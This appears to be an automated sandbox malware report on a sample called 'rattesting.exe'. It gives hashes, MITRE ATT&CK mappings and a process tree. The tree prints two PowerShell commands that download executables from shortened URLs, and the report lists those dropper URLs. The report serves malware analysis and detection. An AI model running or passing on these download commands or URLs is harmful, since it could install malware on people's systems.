d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f

Resubmissions

22-07-2024 10:21

240722-mdl5gashqm 10

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
22-07-2024 10:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rattesting.exe
Size

309KB
MD5

6940553fce65b288660a664eb039ffe2
SHA1

8687dc9a6dc0f4b65035bcc76a5e6785eedf66e1
SHA256

d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f
SHA512

044430fecd45f6119bf06c1ad4a3e7cd02464f579bd901ee883f12c05429812d0181b2fdf918db8a2f0070f7ccec184de0b11ba139a138a48bc45f3508041dc4
SSDEEP

6144:z8JsLcpjzTDDmHayakLkrb4NSarQW82X+t40X9U:IzxzTDWikLSb4NS7t2X+t40X9U

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/m58snm44

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/yc3v5z49

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
3	2576	powershell.exe
5	2576	powershell.exe
7	2576	powershell.exe
9	2576	powershell.exe
10	2576	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2576	powershell.exe
2560	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2560	powershell.exe
2576	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1544 wrote to memory of 2804	1544	rattesting.exe	30
PID 1544 wrote to memory of 2804	1544	rattesting.exe	30
PID 1544 wrote to memory of 2804	1544	rattesting.exe	30
PID 1544 wrote to memory of 2804	1544	rattesting.exe	30
PID 2804 wrote to memory of 2560	2804	cmd.exe	32
PID 2804 wrote to memory of 2560	2804	cmd.exe	32
PID 2804 wrote to memory of 2560	2804	cmd.exe	32
PID 2804 wrote to memory of 2560	2804	cmd.exe	32
PID 2804 wrote to memory of 2576	2804	cmd.exe	33
PID 2804 wrote to memory of 2576	2804	cmd.exe	33
PID 2804 wrote to memory of 2576	2804	cmd.exe	33
PID 2804 wrote to memory of 2576	2804	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\rattesting.exe
"C:\Users\Admin\AppData\Local\Temp\rattesting.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\rattesting.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://tinyurl.com/m58snm44', 'file.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2560
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://tinyurl.com/yc3v5z49', 'le.exe')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
072319cc8216dd16fa473d84528a94f2

SHA1
0a7683264116a4b439aeeea2997139f5bb786b98

SHA256
ef2501ce814706af8ab0f9a5e7ea089853104f4b595cbeb8b9a4aec00920b916

SHA512
d6306093e0f8c2f54d06e04977fb7e6d318e4788da362181a19946de77b8878c82ff561466b77cd6a89e771d217e9694afe07a4861f62d76b417eb3329f4b702

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2030.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\rattesting.bat

Filesize
287B

MD5
e072208f0724637156d508b89db54154

SHA1
ba65e528c56726d34e123bced6d6a3cd26e2cf0a

SHA256
29d168033c119e30aa7939abb96631d2714fb1051d4a25369074047abcca6fda

SHA512
0fabd9faeab61048e7adbcfb9c76b841640a17f26fed512bea0f29222a8a5fe8667eb023c171c3b14735fda000c021e4cdd157f7fcd0cddef917d77adae9be17

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar20BF.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
25cd46b08cc5dfd25cd086757ff15cc0

SHA1
41966025f68387c0a1cc807525a451c593e99bf6

SHA256
a54d05ae235cfc8b427129052ab53c17cf0999ff3fa917875658e114f0029fb7

SHA512
62e6fd029fcff4ef105c6bf9a9349bd537d04edbe5ecbf54ff327e2a10727981556c4650e4cb22c070614809153df23d81a6c3e445f84554e0b30c05500f4cef

Download Submit